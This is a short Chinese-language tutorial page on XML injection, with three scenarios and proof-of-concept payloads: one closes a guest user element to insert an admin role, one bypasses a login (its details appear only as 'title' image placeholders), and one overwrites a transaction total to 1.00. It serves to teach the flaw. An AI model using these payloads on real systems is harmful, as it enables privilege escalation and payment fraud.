跳转至

XML注入

情景1:

漏洞:

<?xml version="1.0" encoding="UTF-8"?> <USER role="guest">attacker's code</USER>

poc:

A</USER><USER role="admin">B

情景2:

漏洞:

title

改变了为空,通过返回错误发现loginid作为登陆判断:

title

poc:

title

結果bypass登陸:

title

情景3:

<transaction> <total>6000.00<total> <credit_card_number>12345</credit_card_number> //12345可控,覆蓋<total>標簽 <expiration>01012008</expiration> </transaction>

poc:

12345</credit_card_number><total>1.00</total><credit_card_number>12345